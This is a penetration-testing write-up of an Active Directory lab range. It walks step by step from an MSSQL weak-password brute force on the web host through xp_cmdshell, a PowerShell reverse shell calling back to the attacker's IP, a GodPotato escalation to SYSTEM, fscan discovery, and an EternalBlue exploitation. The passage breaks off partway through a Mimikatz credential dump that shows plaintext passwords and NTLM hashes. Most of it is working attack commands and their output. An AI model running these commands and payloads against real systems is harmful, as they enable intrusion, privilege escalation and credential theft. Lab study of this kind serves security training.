Building an Internal Network Penetration Methodology: Lab Range WriteUp#
Lab overview#
Official setup guide and image download: https://book.nu1l.com/pentestbook/#/
Image archive password: follow the Nu1L Team WeChat public account (scan the QR code below or search for Nu1L-Team in WeChat) and reply "whoami" to receive it.
Network topology#
Reference: https://book.nu1l.com/pentestbook/#/aerospace/README

| Node | IP | Services | Dual NIC | Domain membership |
|---|---|---|---|---|
| Web01 | NIC 1: NAT, DHCP-assigned / NIC 2: 172.22.10.22 | IIS / SQL Server | Yes | No (workgroup) |
| WIN-PC8086 | 172.22.10.36 | None | No | aerospace.local |
| WIN-PC8098 | 172.22.10.40 | PHPStudy | No | aerospace.local |
| DC01 | 172.22.10.11 | AD DS | No | aerospace.local |
| CA | 172.22.10.13 | AD CS | No | aerospace.local |
Environment deployment#
In VMware Workstation's Virtual Network Editor, create a new adapter "VMnet13" in host-only mode with the subnet 172.22.10.0/24.

Then import the five virtual machine nodes one by one; the import order matters.
The VMs are delivered in a suspended state: just click Resume. Do not change anything else!!!
None of the five VMs come with a known login password; credentials have to be obtained through the penetration itself. Web01 is dual-homed, so its NAT-side IP can be read from the hypervisor; in this build it was 192.168.93.146.

Attack chain#
```
Web01 (192.168.93.146 / 172.22.10.22)
│ [MSSQL weak password sa/123456 → xp_cmdshell → GodPotato privilege escalation]
▼
WIN-PC8086 (172.22.10.36)
│ [MS17-010 EternalBlue → Mimikatz dumps the machine account hash]
▼
WIN-PC8098 (172.22.10.40)
│ [Constrained delegation, S4U2Self + S4U2Proxy → Mimikatz dumps liuyuhua's credentials]
▼
AD CS - AeroUser template (ESC1)
│ [certipy requests a domain admin certificate → LDAP shell resets a password]
▼
DC01 (172.22.10.11) ── aerospace\Administrator
CA (172.22.10.13) ── aerospace\Administrator
```
Phase 1: Web01 (192.168.93.146 / 172.22.10.22)#
1.1 Scanning for live hosts#
```
┌──(xvsf㉿kali)-[~]
└─$ nmap -sn 192.168.93.1/24
Starting Nmap 7.98 ( https://nmap.org ) at 2026-03-20 07:56 -0400
Nmap scan report for 192.168.93.1
Host is up (0.00013s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 192.168.93.2
Host is up (0.00022s latency).
MAC Address: 00:50:56:F3:8D:E9 (VMware)
Nmap scan report for 192.168.93.146
Host is up (0.00011s latency).
MAC Address: 00:0C:29:6E:ED:5F (VMware)
Nmap scan report for 192.168.93.147
Host is up (0.0014s latency).
MAC Address: 00:0C:29:CB:A2:FE (VMware)
Nmap scan report for 192.168.93.254
Host is up (0.00012s latency).
MAC Address: 00:50:56:ED:02:1A (VMware)
Nmap scan report for 192.168.93.128
Host is up.
Nmap done: 256 IP addresses (6 hosts up) scanned in 5.00 seconds
```

192.168.93.1, .2 and .254 belong to the VMware virtual network itself (the host-side adapter, NAT gateway and DHCP server of a default NAT network; note their 00:50:56 OUI), .128 is Kali and .146 is Web01. The fscan output later in this writeup lists 192.168.93.147 among the addresses of 172.22.10.40, so .147 is most likely a NAT-side interface of WIN-PC8098 even though the topology table lists that host as single-homed.
1.2 Port scan#
```
┌──(xvsf㉿kali)-[~]
└─$ nmap 192.168.93.146
Starting Nmap 7.98 ( https://nmap.org ) at 2026-03-20 08:07 -0400
Nmap scan report for 192.168.93.146
Host is up (0.00044s latency).
Not shown: 996 filtered tcp ports (no-response)
PORT     STATE SERVICE
21/tcp   open  ftp
80/tcp   open  http
1433/tcp open  ms-sql-s
5985/tcp open  wsman
MAC Address: 00:0C:29:6E:ED:5F (VMware)
Nmap done: 1 IP address (1 host up) scanned in 4.74 seconds
```
Follow up on the four open ports with version detection and the default script set (-sV: probe service versions; -sC: run the default NSE scripts):
```
┌──(xvsf㉿kali)-[~]
└─$ nmap -sV -sC -p21,80,1433,5985 192.168.93.146
Starting Nmap 7.98 ( https://nmap.org ) at 2026-03-20 08:11 -0400
Nmap scan report for 192.168.93.146
Host is up (0.00038s latency).
PORT     STATE SERVICE  VERSION
21/tcp   open  ftp      Microsoft ftpd
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
|_  SYST: Windows_NT
80/tcp   open  http     Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Home
| http-methods:
|_  Potentially risky methods: TRACE
1433/tcp open  ms-sql-s Microsoft SQL Server 2016 13.00.4001.00; SP1
| ms-sql-ntlm-info:
|   192.168.93.146:1433:
|     Target_Name: WIN-IISSERVER
|     NetBIOS_Domain_Name: WIN-IISSERVER
|     NetBIOS_Computer_Name: WIN-IISSERVER
|     DNS_Domain_Name: WIN-IISSERVER
|     DNS_Computer_Name: WIN-IISSERVER
|_    Product_Version: 10.0.17763
| ms-sql-info:
|   192.168.93.146:1433:
|     Version:
|       name: Microsoft SQL Server 2016 SP1
|       number: 13.00.4001.00
|       Product: Microsoft SQL Server 2016
|       Service pack level: SP1
|       Post-SP patches applied: false
|_    TCP port: 1433
5985/tcp open  http     Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
MAC Address: 00:0C:29:6E:ED:5F (VMware)
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
```
Two things worth noting before touching anything: the NTLM challenge leaks the host name WIN-IISSERVER with the domain name equal to the host name, i.e. the box is not domain-joined, and Product_Version 10.0.17763 is the Windows Server 2019 build. Port 5985 (WinRM) is a useful fallback for command execution once credentials are in hand.
1.3 FTP enumeration#
```
┌──(xvsf㉿kali)-[~]
└─$ ftp 192.168.93.146
Connected to 192.168.93.146.
220 Microsoft FTP Service
Name (192.168.93.146:xvsf): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> pwd
Remote directory: /
ftp> dir -a
229 Entering Extended Passive Mode (|||53362|)
125 Data connection already open; Transfer starting.
226 Transfer complete.
ftp> bye
221 Goodbye.
```
The anonymous FTP root is empty; there is nothing to use here.
1.4 HTTP directory scan#
```
┌──(xvsf㉿kali)-[~]
└─$ dirsearch -u http://192.168.93.146
```

dirsearch finds a /download directory and an authenticated /reports page, but no directly exploitable entry point.
1.5 MS-SQL weak password brute force#
Port 1433 is SQL Server's default port. Brute-force the built-in sa login with hydra:
```
hydra -l sa -P /usr/share/wordlists/rockyou.txt 192.168.93.146 mssql -t 4
```

Result: sa / 123456. sa is a member of the sysadmin fixed server role, the highest privilege level inside SQL Server, which is enough to enable xp_cmdshell and run OS commands as the SQL Server service account. (fscan, run from inside the network in 1.9, later confirms the same pair: `[+] mssql 172.22.10.22:1433:sa 123456`.)
1.6 Connecting to MS-SQL and obtaining system-level execution#
```
┌──(xvsf㉿kali)-[~]
└─$ impacket-mssqlclient sa:123456@192.168.93.146
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: 简体中文
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(WIN-IISSERVER): Line 1: Changed database context to "master".
[*] INFO(WIN-IISSERVER): Line 1: Changed language setting to 简体中文.
[*] ACK: Result: 1 - Microsoft SQL Server 2016 (SP1) (13.0.4001)
[!] Press help for extra shell commands
SQL (sa dbo@master)>
```
Enable xp_cmdshell and run an OS command. sp_configure changes require the sysadmin role (which sa has); each RECONFIGURE applies the preceding setting, and "show advanced options" must be on before xp_cmdshell becomes visible:
```
SQL (sa dbo@master)> EXEC sp_configure 'show advanced options', 1;
SQL (sa dbo@master)> RECONFIGURE;
SQL (sa dbo@master)> EXEC sp_configure 'xp_cmdshell', 1;
SQL (sa dbo@master)> RECONFIGURE;
SQL (sa dbo@master)> EXEC xp_cmdshell 'whoami';
output
----------------------
nt service\mssqlserver
NULL
```
The commands run as nt service\mssqlserver, the SQL Server virtual service account. The OS is Windows Server 2019 Datacenter (consistent with build 10.0.17763 reported by nmap) and the host is dual-homed (192.168.93.146 / 172.22.10.22).
1.7 Reverse shell#
PowerShell's -e / -EncodedCommand switch expects base64 of the UTF-16LE encoding of the script, not UTF-8, hence the iconv step. Start the listener before running the xp_cmdshell line.
```
# On Kali: build the base64-encoded PowerShell reverse shell (the base64 blob is omitted below)
echo '$client = New-Object System.Net.Sockets.TCPClient("192.168.93.128",4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()' | iconv -t UTF-16LE | base64 -w 0
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
# On Kali, in a second terminal: listen
nc -lvnp 4444
# In the SQL session: launch the encoded command
EXEC xp_cmdshell 'powershell -nop -e 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';
```

1.8 Privilege escalation with GodPotato#
The service account holds SeImpersonatePrivilege (verify with `whoami /priv`), so a Potato-family tool can escalate to SYSTEM. The -NET4 build of GodPotato targets the .NET Framework 4.x runtime that ships with Server 2019.
GodPotato: https://github.com/BeichenDream/GodPotato
```
# Kali: serve the binary
python3 -m http.server 8080
# Target: download it (certutil keeps a copy in its URL cache; `certutil -urlcache * delete` cleans it up)
certutil -urlcache -split -f http://192.168.93.128:8080/GodPotato-NET4.exe C:\Windows\Temp\GodPotato.exe
# Test the escalation
C:\Windows\Temp\GodPotato.exe -cmd "whoami"
```
```
PS C:\Windows\system32> C:\Windows\Temp\GodPotato.exe -cmd "whoami"
[*] CurrentUser: NT AUTHORITY\SYSTEM
[*] process start with pid 2684
nt authority\system
```
Escalation succeeded. Use GodPotato once more to spawn a SYSTEM-level reverse shell (same encoded payload as in 1.7, with a fresh listener):
```
C:\Windows\Temp\GodPotato.exe -cmd "powershell -nop -e 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"
```

1.9 Internal host discovery#
Upload fscan and sweep the internal segment 172.22.10.0/24:
```
certutil -urlcache -split -f http://192.168.93.128:8080/fscan.exe C:\Windows\Temp\fscan.exe
C:\Windows\Temp\fscan.exe -h 172.22.10.1/24
```
```
PS C:\Windows\system32> whoami
nt authority\system
PS C:\Windows\system32> certutil -urlcache -split -f http://192.168.93.128:8080/fscan.exe C:\Windows\Temp\fscan.exe
****  Online  ****
  000000  ...
  6ee000
CertUtil: -URLCache command completed successfully.
PS C:\Windows\system32> dir C:\Windows\Temp\
    Directory: C:\Windows\Temp
Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----        2024/2/22     11:45                DiagTrack_alternativeTrace
d-----        2024/2/22     11:45                DiagTrack_aot
d-----        2024/2/22     11:45                DiagTrack_diag
d-----        2024/2/22     11:45                DiagTrack_miniTrace
d-----        2024/2/21     21:02                vmware-SYSTEM
-a----        2024/2/21     21:55           1020 ASPNETSetup_00000.log
-a----        2024/2/21     21:56           1022 ASPNETSetup_00001.log
-a----        2026/3/20     22:05              0 fscan
-a----        2026/3/20     22:22        7266304 fscan.exe
-a----        2026/3/20     21:08          57344 GodPotato.exe
-a----        2024/2/22      0:26           2696 MpCmdRun.log
-a----        2026/3/20     21:11          45056 sam
-a----        2024/2/22     11:46            103 silconfig.log
-a----        2026/3/20     21:11       17252352 system
-a----        2024/2/22     11:45          17470 vmware-vmsvc-SYSTEM.log
-a----        2024/2/21     21:35            976 vmware-vmtoolsd-Administrator.log
-a----        2024/2/22     11:45           1464 vmware-vmtoolsd-SYSTEM.log
-a----        2024/2/22     11:45           6374 vmware-vmusr-Administrator.log
-a----        2024/2/22     11:45            958 vmware-vmvss-SYSTEM.log
PS C:\Windows\system32> C:\Windows\Temp\fscan.exe -h 172.22.10.1/24
start infoscan
(icmp) Target 172.22.10.11 is alive
(icmp) Target 172.22.10.13 is alive
(icmp) Target 172.22.10.22 is alive
(icmp) Target 172.22.10.36 is alive
(icmp) Target 172.22.10.40 is alive
[*] Icmp alive hosts len is: 5
172.22.10.40:7680 open
172.22.10.11:88 open
172.22.10.40:3306 open
172.22.10.22:1433 open
172.22.10.40:445 open
172.22.10.36:445 open
172.22.10.22:445 open
172.22.10.13:445 open
172.22.10.11:445 open
172.22.10.40:139 open
172.22.10.36:139 open
172.22.10.22:139 open
172.22.10.13:139 open
172.22.10.11:139 open
172.22.10.40:135 open
172.22.10.36:135 open
172.22.10.22:135 open
172.22.10.13:135 open
172.22.10.11:135 open
172.22.10.40:80 open
172.22.10.22:80 open
172.22.10.13:80 open
172.22.10.22:21 open
[*] alive ports len is: 23
start vulscan
[*] WebTitle http://172.22.10.13 code:200 len:703 title:IIS Windows Server
[+] ftp 172.22.10.22:21:anonymous
[+] MS17-010 172.22.10.36 (Windows 7 Professional 7601 Service Pack 1)
[+] MS17-010 172.22.10.11 (Windows Server 2016 Datacenter 14393)
[*] NetBios 172.22.10.40 AEROSPACE\WIN-PC8098
[*] NetInfo
[*]172.22.10.11
   [->]DC01
   [->]172.22.10.11
[*] NetInfo
[*]172.22.10.40
   [->]WIN-PC8098
   [->]192.168.93.147
   [->]172.22.10.40
[*] NetInfo
[*]172.22.10.36
   [->]WIN-PC8086
   [->]172.22.10.36
[*] NetInfo
[*]172.22.10.13
   [->]CA
   [->]172.22.10.13
[*] NetBios 172.22.10.11 [+] DC:DC01.aerospace.local Windows Server 2016 Datacenter 14393
[*] NetBios 172.22.10.13 CA.aerospace.local Windows Server 2016 Datacenter 14393
[+] PocScan http://172.22.10.13 poc-yaml-active-directory-certsrv-detect
[+] mssql 172.22.10.22:1433:sa 123456
Completed 23/23
[*] Scan finished, elapsed: 1m48.9636068s
PS C:\Windows\system32>
```
(The `sam` and `system` files dated 21:11 in C:\Windows\Temp appear to be registry hive copies saved earlier in the session; that step is not shown in this writeup.)
Key findings:
- 172.22.10.36 (WIN-PC8086): vulnerable to MS17-010 (Windows 7 SP1)
- 172.22.10.11 (DC01): domain controller (Kerberos on 88). fscan also flags it for MS17-010 (Windows Server 2016 14393), but the Windows 7 host is the target taken here, since the Metasploit EternalBlue module is reliable against Windows 7 SP1 and a failed kernel-pool exploit against a DC would be far more disruptive
- 172.22.10.13 (CA): certificate server; the certsrv PoC confirms AD CS web enrollment on port 80
- 172.22.10.40 (WIN-PC8098): domain workstation (PHPStudy on 80, MySQL on 3306)
Phase 2: WIN-PC8086 (172.22.10.36), EternalBlue#
2.1 Exploiting MS17-010#
WIN-PC8086 runs Windows 7 SP1 and is vulnerable to MS17-010. Attack it with Metasploit, using a bind payload so the target does not have to reach Kali's NAT-side address. The transcript shows Kali connecting directly to 172.22.10.36:4444, so Kali already has a path into 172.22.10.0/24 at this point (for example a second adapter on VMnet13, or a route via Web01); the writeup does not show how that was set up.
```
use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/meterpreter/bind_tcp
set rhosts 172.22.10.36
set lport 4444
run
```
```
┌──(xvsf㉿kali)-[~]
└─$ msfconsole
Metasploit tip: Open an interactive Ruby terminal with irb
[... ASCII-art banner trimmed ...]
       =[ metasploit v6.4.116-dev                          ]
+ -- --=[ 2,623 exploits - 1,326 auxiliary - 1,710 payloads ]
+ -- --=[ 432 post - 49 encoders - 14 nops - 10 evasion     ]
Metasploit Documentation: https://docs.metasploit.com/
The Metasploit Framework is a Rapid7 Open Source Project
msf > use exploit/windows/smb/ms17_010_eternalblue
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/bind_tcp
payload => windows/x64/meterpreter/bind_tcp
msf exploit(windows/smb/ms17_010_eternalblue) > set rhosts 172.22.10.36
rhosts => 172.22.10.36
msf exploit(windows/smb/ms17_010_eternalblue) > set lport 4444
lport => 4444
msf exploit(windows/smb/ms17_010_eternalblue) > run
[*] 172.22.10.36:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 172.22.10.36:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
/usr/share/metasploit-framework/vendor/bundle/ruby/3.3.0/gems/recog-3.1.26/lib/recog/fingerprint/regexp_factory.rb:34: warning: nested repeat operator '+' and '?' was replaced with '*' in regular expression
[*] 172.22.10.36:445 - Scanned 1 of 1 hosts (100% complete)
[+] 172.22.10.36:445 - The target is vulnerable.
[*] 172.22.10.36:445 - Connecting to target for exploitation.
[+] 172.22.10.36:445 - Connection established for exploitation.
[+] 172.22.10.36:445 - Target OS selected valid for OS indicated by SMB reply
[*] 172.22.10.36:445 - CORE raw buffer dump (42 bytes)
[*] 172.22.10.36:445 - 0x00000000  57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73  Windows 7 Profes
[*] 172.22.10.36:445 - 0x00000010  73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76  sional 7601 Serv
[*] 172.22.10.36:445 - 0x00000020  69 63 65 20 50 61 63 6b 20 31                    ice Pack 1
[+] 172.22.10.36:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 172.22.10.36:445 - Trying exploit with 12 Groom Allocations.
[*] 172.22.10.36:445 - Sending all but last fragment of exploit packet
[*] 172.22.10.36:445 - Starting non-paged pool grooming
[+] 172.22.10.36:445 - Sending SMBv2 buffers
[+] 172.22.10.36:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 172.22.10.36:445 - Sending final SMBv2 buffers.
[*] 172.22.10.36:445 - Sending last fragment of exploit packet!
[*] 172.22.10.36:445 - Receiving response from exploit packet
[+] 172.22.10.36:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 172.22.10.36:445 - Sending egg to corrupted connection.
[*] 172.22.10.36:445 - Triggering free of corrupted buffer.
[*] Started bind TCP handler against 172.22.10.36:4444
[-] 172.22.10.36:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 172.22.10.36:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=FAIL-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 172.22.10.36:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[*] 172.22.10.36:445 - Connecting to target for exploitation.
[+] 172.22.10.36:445 - Connection established for exploitation.
[+] 172.22.10.36:445 - Target OS selected valid for OS indicated by SMB reply
[*] 172.22.10.36:445 - CORE raw buffer dump (42 bytes)
[*] 172.22.10.36:445 - 0x00000000  57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73  Windows 7 Profes
[*] 172.22.10.36:445 - 0x00000010  73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76  sional 7601 Serv
[*] 172.22.10.36:445 - 0x00000020  69 63 65 20 50 61 63 6b 20 31                    ice Pack 1
[+] 172.22.10.36:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 172.22.10.36:445 - Trying exploit with 17 Groom Allocations.
[*] 172.22.10.36:445 - Sending all but last fragment of exploit packet
[*] 172.22.10.36:445 - Starting non-paged pool grooming
[+] 172.22.10.36:445 - Sending SMBv2 buffers
[+] 172.22.10.36:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 172.22.10.36:445 - Sending final SMBv2 buffers.
[*] 172.22.10.36:445 - Sending last fragment of exploit packet!
[*] 172.22.10.36:445 - Receiving response from exploit packet
[+] 172.22.10.36:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 172.22.10.36:445 - Sending egg to corrupted connection.
[*] 172.22.10.36:445 - Triggering free of corrupted buffer.
[*] Sending stage (232006 bytes) to 172.22.10.36
[*] Meterpreter session 1 opened (192.168.93.128:33987 -> 172.22.10.36:4444) at 2026-03-20 10:41:20 -0400
[+] 172.22.10.36:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 172.22.10.36:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 172.22.10.36:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
meterpreter > sysinfo
Computer        : WIN-PC8086
OS              : Windows 7 (6.1 Build 7601, Service Pack 1).
Architecture    : x64
System Language : zh_CN
Domain          : AEROSPACE
Logged On Users : 3
Meterpreter     : x64/windows
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >
```
The first attempt failed at the pool-grooming stage (the FAIL banner) and the module retried automatically with more groom allocations, which succeeded. That is normal for EternalBlue, but every failed attempt is a chance to blue-screen the target, so do not re-run it in a loop. Because this is a kernel exploit, the session runs as NT AUTHORITY\SYSTEM straight away.

2.2 Dumping credentials with Mimikatz#
This host is domain-joined, so use Mimikatz (the kiwi extension, loaded into the SYSTEM-level meterpreter) to harvest what LSASS holds. On Windows 7 the WDigest provider still keeps plaintext passwords in memory by default, which is why a cleartext password shows up below alongside the NTLM hashes:
```
load kiwi
kiwi_cmd "sekurlsa::logonpasswords"
```
```
meterpreter > load kiwi
Loading extension kiwi...
  .#####.   mimikatz 2.2.0 20191125 (x64/windows)
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > http://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > http://pingcastle.com / http://mysmartlogon.com ***/
Success.
meterpreter > kiwi_cmd "sekurlsa::logonpasswords"
Authentication Id : 0 ; 5564485 (00000000:0054e845)
Session           : Interactive from 1
User Name         : John
Domain            : WIN-PC8086
Logon Server      : WIN-PC8086
Logon Time        : 2024/2/22 11:38:28
SID               : S-1-5-21-756936077-305233120-2093608108-1000
        msv :
         [00000003] Primary
         * Username : John
         * Domain   : WIN-PC8086
         * LM       : 7fbdbe322b6101bb1aa818381e4e281b
         * NTLM     : 5ffb08c80d9f260355e01c17a233e8f1
         * SHA1     : 8afa1eebf3490d255619262e43aa71ba1ab4b52e
        tspkg :
         * Username : John
         * Domain   : WIN-PC8086
         * Password : John@123
        wdigest :
         * Username : John
         * Domain   : WIN-PC8086
         * Password : John@123
        kerberos :
         * Username : John
         * Domain   : WIN-PC8086
         * Password : John@123
        ssp :
        credman :
Authentication Id : 0 ; 5564450 (00000000:0054e822)
Session           : Interactive from 1
User Name         : John
Domain            : WIN-PC8086
Logon Server      : WIN-PC8086
Logon Time        : 2024/2/22 11:38:28
SID               : S-1-5-21-756936077-305233120-2093608108-1000
        msv :
         [00000003] Primary
         * Username : John
         * Domain   : WIN-PC8086
         * LM       : 7fbdbe322b6101bb1aa818381e4e281b
         * NTLM     : 5ffb08c80d9f260355e01c17a233e8f1
         * SHA1     : 8afa1eebf3490d255619262e43aa71ba1ab4b52e
        tspkg :
         * Username : John
         * Domain   : WIN-PC8086
         * Password : John@123
        wdigest :
         * Username : John
         * Domain   : WIN-PC8086
         * Password : John@123
        kerberos :
         * Username : John
         * Domain   : WIN-PC8086
         * Password : John@123
        ssp :
        credman :
Authentication Id : 0 ; 997 (00000000:000003e5)
Session           : Service from 0
User Name         : LOCAL SERVICE
Domain            : NT AUTHORITY
Logon Server      : (null)
Logon Time        : 2024/2/22 0:15:26
SID               : S-1-5-19
        msv :
        tspkg :
        wdigest :
         * Username : (null)
         * Domain   : (null)
         * Password : (null)
        kerberos :
         * Username : (null)
         * Domain   : (null)
         * Password : (null)
        ssp :
        credman :
Authentication Id : 0 ; 996 (00000000:000003e4)
Session           : Service from 0
User Name         : WIN-PC8086$
Domain            : AEROSPACE
Logon Server      : (null)
Logon Time        : 2024/2/22 0:15:26
SID               : S-1-5-20
        msv :
         [00000003] Primary
         * Username : WIN-PC8086$
         * Domain   : AEROSPACE
         * NTLM     : 1878248073dc58f665227675e99b8333
         * SHA1     : b4ce7bea0939e9ac4b3b0f9235f857ccf08cac23
        tspkg :
        wdigest :
         * Username : WIN-PC8086$
         * Domain   : AEROSPACE
         * Password : 4d 75 54 14 3a 7f c6 6c ac d2 c4 b1 04 09 69 82 0a 62 9d 02 7f e3 56 df 86 e2 ac c8 f2 4e ed 39 e7 f2 0c 9f 3c e8 0e a2 dc ae 46 13 28 29 7f 2c ce 3c 50 da 06 b1 eb d7 18 1f 35 b1 87 38 a8 3b a4 6e b2 c3 75 88 36 b6 ae dc 46 18 86 63 c9 cb 4d 63 ae 31 35 49 8c 7e 59 8f 05 ce 5b 5b 1d 5c dd 60 58 b5 ad f3 e0 c4 0d ca 5e e7 93 61 3f e8 48 a9 9e ba 02 7a 9f df 88 84 4e ad 87 81 2d 4e b6 00 36 92 4e 9d 27 03 3f c9 eb a0 05 3b 25 92 c8 55 40 e8 6b bd 9c 6b 0f 7e ef 73 49 67 96 e1 7a 68 35 e0 39 25 50 7b 2a 96 a0 13 7f d1 7f 9a 2b 63 5d 4d 58 ae 15 07 a1 70 02 73 a7 f3 45 80 5d 41 7a bb 8a 6d e1 29 47 a8 84 ca 92 8f a3 27 25 a2 4a 55 df 65 cc 72 5b 7e f2 f2 6d ff d5 07 a3 ec 64 d8 c3 a7 cf 41 b0 c9 25 2e 7a 12 83 07
        kerberos :
         * Username : win-pc8086$
         * Domain   : AEROSPACE.LOCAL
         * Password : 4d 75 54 14 3a 7f c6 6c ac d2 c4 b1 04 09 69 82 0a 62 9d 02 7f e3 56 df 86 e2 ac c8 f2 4e ed 39 e7 f2 0c 9f 3c e8 0e a2 dc ae 46 13 28 29 7f 2c ce 3c 50 da 06 b1 eb d7 18 1f 35 b1 87 38 a8 3b a4 6e b2 c3 75 88 36 b6 ae dc 46 18 86 63 c9 cb 4d 63 ae 31 35 49 8c 7e 59 8f 05 ce 5b 5b 1d 5c dd 60 58 b5 ad f3 e0 c4 0d ca 5e e7 93 61 3f e8 48 a9 9e ba 02 7a 9f df 88 84 4e ad 87 81 2d 4e b6 00 36 92 4e 9d 27 03 3f c9 eb a0 05 3b 25 92 c8 55 40 e8 6b bd 9c 6b 0f 7e ef 73 49 67 96 e1 7a 68 35 e0 39 25 50 7b 2a 96 a0 13 7f d1 7f 9a 2b 63 5d 4d 58 ae 15 07 a1 70 02 73 a7 f3 45 80 5d 41 7a bb 8a 6d e1 29 47 a8 84 ca 92 8f a3 27 25 a2 4a 55 df 65 cc 72 5b 7e f2 f2 6d ff d5 07 a3 ec 64 d8 c3 a7 cf 41 b0 c9 25 2e 7a 12 83 07
        ssp :
        credman :
Authentication Id : 0 ; 47080 (00000000:0000b7e8)
Session           : UndefinedLogonType from 0
User Name         : (null)
Domain            : (null)
Logon Server      : (null)
Logon Time        : 2024/2/22 0:15:26
SID               :
        msv :
         [00000003] Primary
         * Username : WIN-PC8086$
         * Domain   : AEROSPACE
         * NTLM     : 1878248073dc58f665227675e99b8333
         * SHA1     : b4ce7bea0939e9ac4b3b0f9235f857ccf08cac23
        tspkg :
        wdigest :
        kerberos :
        ssp :
        credman :
Authentication Id : 0 ; 999 (00000000:000003e7)
Session           : UndefinedLogonType from 0
User Name         : WIN-PC8086$
Domain            : AEROSPACE
Logon Server      : (null)
Logon Time        : 2024/2/22 0:15:26
SID               : S-1-5-18
        msv :
        tspkg :
        wdigest :
         * Username : WIN-PC8086$
         * Domain   : AEROSPACE
         * Password : 4d 75 54 14 3a 7f c6 6c ac d2 c4 b1 04 09 69 82 0a 62 9d 02 7f e3 56 df 86 e2 ac c8 f2 4e ed 39 e7 f2 0c 9f 3c e8 0e a2 dc ae 46 13 28 29 7f 2c ce 3c 50 da 06 b1 eb d7 18 1f 35 b1 87 38 a8 3b a4 6e b2 c3 75 88 36 b6 ae dc 46 18 86 63 c9 cb 4d 63 ae 31 35 49 8c 7e 59 8f 05 ce 5b 5b 1d 5c dd 60 58 b5 ad f3 e0 c4 0d ca 5e e7 93 61 3f e8 48 a9 9e ba 02 7a 9f df 88 84 4e ad 87 81 2d 4e b6 00 36 92 4e 9d 27 03 3f c9 eb a0 05 3b 25 92 c8 55 40 e8 6b bd 9c 6b 0f 7e ef 73 49 67 96 e1 7a 68 35 e0 39 25 50 7b 2a 96 a0 13 7f d1 7f 9a 2b 63 5d 4d 58 ae 15 07 a1 70 02 73 a7 f3 45 80 5d 41 7a bb 8a 6d e1 29 47 a8 84 ca 92 8f a3 27 25 a2 4a 55 df 65 cc 72 5b 7e f2 f2 6d ff d5 07 a3 ec 64 d8 c3 a7 cf 41 b0 c9 25 2e 7a 12 83 07
        kerberos :
         * Username : win-pc8086$
         * Domain   : AEROSPACE.LOCAL
